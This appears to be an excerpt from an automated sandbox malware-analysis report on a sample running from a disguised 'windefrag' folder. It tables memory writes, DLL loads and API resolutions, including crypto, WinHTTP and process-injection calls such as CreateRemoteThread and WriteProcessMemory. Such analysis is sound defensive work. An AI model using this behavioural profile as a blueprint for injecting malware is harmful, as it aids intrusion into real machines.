| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 16 |
|
5 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0f0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a0f8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a100, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a108, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a110, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a118, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a120, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a128, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a130, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a138, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a140, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a148, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a150, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a158, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a160, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a168, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a170, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a178, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a180, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a188, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a190, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a1e0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a1e8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a000, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a008, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a010, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a018, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a020, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a028, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a030, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a038, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a040, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a048, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a050, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a058, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a1d0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a430, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a438, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a1a0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a1a8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a1b0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a1b8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a1c0, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a068, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a1f8, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a200, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x20010, size = 26 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a208, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a210, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a218, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a220, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a228, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a230, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a238, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a240, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a248, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a250, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a260, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a268, size = 8 |
|
1 | |
| Modify Memory | #17: c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe | 0x24c | address = 0x14002a270, size = 8 |
|
1 |
Threads
Thread 0x9a0
336
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = msvcrt.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = __C_specific_handler, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Get Address | function = _XcptFilter, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = _exit, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = _cexit, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = exit, ordinal = 0, address_out = 0x20015 |
|
1 | |
| Module | Get Address | function = _wcmdln, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = _initterm, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Get Address | function = _amsg_exit, ordinal = 0, address_out = 0x2001b |
|
1 | |
| Module | Get Address | function = _localtime64, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = _time64, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = ??2@YAPEAX_K@Z, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = __setusermatherr, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = _commode, ordinal = 0, address_out = 0x20019 |
|
1 | |
| Module | Get Address | function = _fmode, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = __set_app_type, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = ?terminate@@YAXXZ, ordinal = 0, address_out = 0x20022 |
|
1 | |
| Module | Get Address | function = sprintf, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = sscanf, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = free, ordinal = 0, address_out = 0x20015 |
|
1 | |
| Module | Get Address | function = malloc, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = strtok, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = realloc, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = _CxxThrowException, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = ??1type_info@@UEAA@XZ, ordinal = 0, address_out = 0x20026 |
|
1 | |
| Module | Get Address | function = __wgetmainargs, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = _vsnprintf, ordinal = 0, address_out = 0x2001b |
|
1 | |
| Module | Get Address | function = atoi, ordinal = 0, address_out = 0x20015 |
|
1 | |
| Module | Get Address | function = strstr, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = _wtoi, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = rand, ordinal = 0, address_out = 0x20015 |
|
1 | |
| Module | Get Address | function = tolower, ordinal = 0, address_out = 0x20018 |
|
1 | |
| Module | Get Address | function = memcmp, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = srand, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = _itow, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = _vsnwprintf, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = ??3@YAXPEAX@Z, ordinal = 0, address_out = 0x2001e |
|
1 | |
| Module | Get Address | function = memset, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Get Address | function = wcsftime, ordinal = 0, address_out = 0x20019 |
|
1 | |
| Module | Get Address | function = ??_V@YAXPEAX@Z, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = memcpy, ordinal = 0, address_out = 0x20017 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = SystemTimeToFileTime, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Get Address | function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x20028 |
|
1 | |
| Module | Get Address | function = GetCurrentProcessId, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = GetCurrentThreadId, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = GetTickCount, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = QueryPerformanceCounter, ordinal = 0, address_out = 0x20028 |
|
1 | |
| Module | Get Address | function = LocalFree, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Get Address | function = TerminateProcess, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = GetCurrentProcess, ordinal = 0, address_out = 0x20022 |
|
1 | |
| Module | Get Address | function = GetModuleHandleW, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = UnhandledExceptionFilter, ordinal = 0, address_out = 0x20029 |
|
1 | |
| Module | Get Address | function = RtlVirtualUnwind, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = RtlLookupFunctionEntry, ordinal = 0, address_out = 0x20027 |
|
1 | |
| Module | Get Address | function = RtlCaptureContext, ordinal = 0, address_out = 0x20022 |
|
1 | |
| Module | Get Address | function = SetUnhandledExceptionFilter, ordinal = 0, address_out = 0x2002c |
|
1 | |
| Module | Get Address | function = GetStartupInfoW, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Get Address | function = CloseHandle, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = WriteFile, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Get Address | function = CreateFileA, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = WaitForSingleObject, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = CreateProcessA, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = DeleteFileA, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = GetTempPathA, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = GetModuleFileNameW, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = GetSystemDirectoryW, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = Sleep, ordinal = 0, address_out = 0x20016 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = LoadLibraryW, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = GetLastError, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = GetVolumeInformationW, ordinal = 0, address_out = 0x20026 |
|
1 | |
| Module | Get Address | function = GetWindowsDirectoryW, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Get Address | function = CreateProcessW, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = lstrlenW, ordinal = 0, address_out = 0x20019 |
|
1 | |
| Module | Get Address | function = GetFullPathNameW, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = GetSystemTime, ordinal = 0, address_out = 0x2001e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = wsprintfW, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Get Address | function = wsprintfA, ordinal = 0, address_out = 0x2001a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = RegQueryValueExW, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = RegOpenKeyW, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = RegSetValueExW, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = CryptDecrypt, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = CryptSetKeyParam, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = CryptDestroyKey, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Get Address | function = CryptEncrypt, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = CryptImportKey, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = CryptAcquireContextA, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Get Address | function = CryptReleaseContext, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = RegCreateKeyExW, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Get Address | function = RegCloseKey, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = SHGetFolderPathW, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = CoInitializeEx, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = CoInitializeSecurity, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 2, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 6, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 8, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 9, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 4, address_out = 0x20000 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = CryptStringToBinaryA, ordinal = 0, address_out = 0x20025 |
|
1 | |
| Module | Load | module_name = WINHTTP.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = WinHttpQueryHeaders, ordinal = 0, address_out = 0x20024 |
|
1 | |
| Module | Get Address | function = WinHttpCloseHandle, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = WinHttpQueryDataAvailable, ordinal = 0, address_out = 0x2002a |
|
1 | |
| Module | Get Address | function = WinHttpOpen, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = WinHttpReceiveResponse, ordinal = 0, address_out = 0x20027 |
|
1 | |
| Module | Get Address | function = WinHttpSendRequest, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = WinHttpSetOption, ordinal = 0, address_out = 0x20021 |
|
1 | |
| Module | Get Address | function = WinHttpOpenRequest, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = WinHttpSetTimeouts, ordinal = 0, address_out = 0x20023 |
|
1 | |
| Module | Get Address | function = WinHttpConnect, ordinal = 0, address_out = 0x2001f |
|
1 | |
| Module | Get Address | function = WinHttpReadData, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Get Address | function = WinHttpCrackUrl, ordinal = 0, address_out = 0x20020 |
|
1 | |
| Module | Load | module_name = WS2_32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 116, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = getaddrinfo, ordinal = 0, address_out = 0x2001c |
|
1 | |
| Module | Get Address | function = freeaddrinfo, ordinal = 0, address_out = 0x2001d |
|
1 | |
| Module | Get Address | function = 0, ordinal = 57, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 9, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 8, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 12, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 5, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 19, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 3, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 23, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 16, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 21, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 11, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 4, address_out = 0x20000 |
|
1 | |
| Module | Get Address | function = 0, ordinal = 115, address_out = 0x20000 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-06 22:28:02 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 191990 |
|
1 | |
| Module | Get Handle | module_name = private_0x0000000140000000, base_address = 0x140000000 |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x77b36580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameW, address_out = 0x77b2d130 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpW, address_out = 0x77b3d9c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x77b33ec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFullPathNameW, address_out = 0x77b376e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileW, address_out = 0x77b3bd80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindResourceW, address_out = 0x77b39b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeLibrary, address_out = 0x77b36620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadResource, address_out = 0x77b398c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x77b43730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFileTime, address_out = 0x77b33880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcpynW, address_out = 0x77b6bab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x77b42dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindClose, address_out = 0x77b3bd60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LockResource, address_out = 0x77b28720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetSystemInfo, address_out = 0x77b36f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FindNextFileW, address_out = 0x77b31910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileTime, address_out = 0x77b24f80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x77b37070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x77b81230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFileAttributesW, address_out = 0x77b337a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateDirectoryW, address_out = 0x77b2ad70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObject, address_out = 0x77b42b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SignalObjectAndWait, address_out = 0x77b92c90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetEvent, address_out = 0x77b33f00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateRemoteThread, address_out = 0x77b6c4f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = OpenProcess, address_out = 0x77b3cad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualFreeEx, address_out = 0x77b6bb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReadProcessMemory, address_out = 0x77b6bdc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x77b6bca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualProtectEx, address_out = 0x77b6bb70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAllocEx, address_out = 0x77b6bbd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ResetEvent, address_out = 0x77b2d9a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetExitCodeThread, address_out = 0x77b31130 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateEventW, address_out = 0x77b35290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = DuplicateHandle, address_out = 0x77b35d10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WriteProcessMemory, address_out = 0x77b6bad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ResumeThread, address_out = 0x77b313a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateMutexW, address_out = 0x77b313c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LocalFree, address_out = 0x77b347a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcpyW, address_out = 0x77b6e0d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = DeleteFileW, address_out = 0x77b2ad90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetCurrentDirectoryW, address_out = 0x77b3cab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x77c92fc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = MoveFileW, address_out = 0x77baf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTempPathW, address_out = 0x77b82040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetStartupInfoW, address_out = 0x77b38070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameW, address_out = 0x77b37700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetFileAttributesW, address_out = 0x77b3bdd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77c93000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x77b42b70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x77b364e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTickCount, address_out = 0x77b42b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = MoveFileExW, address_out = 0x77b23060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateProcessW, address_out = 0x77b41bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetTempFileNameW, address_out = 0x77b6c030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpiW, address_out = 0x77b31930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileW, address_out = 0x77b31870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReadFile, address_out = 0x77b31500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x77b435a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFilePointer, address_out = 0x77b31150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetVersion, address_out = 0x77b301d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x77b42f80 |
|
1 | |
